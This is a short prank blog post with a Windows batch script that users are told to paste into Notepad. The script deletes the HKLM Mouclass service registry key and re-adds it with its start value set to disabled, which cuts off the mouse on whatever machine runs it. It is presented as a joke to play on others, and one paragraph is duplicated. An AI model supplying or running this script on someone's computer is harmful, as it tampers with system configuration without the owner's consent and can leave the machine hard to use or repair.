How to Disable Mouse
In past, I've posted many useful pranks for my visitors. One of those pranks is given as below.
CD-ROM Prank in WIndows
In this post, I'm going to show you one more amazing prank. So lets start preparations of disabling mouse in windows.
CD-ROM Prank in WIndows
In this post, I'm going to show you one more amazing prank. So lets start preparations of disabling mouse in windows.
Now,lets start
- First open Notepad & copy the below coding,As
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
COMMENTS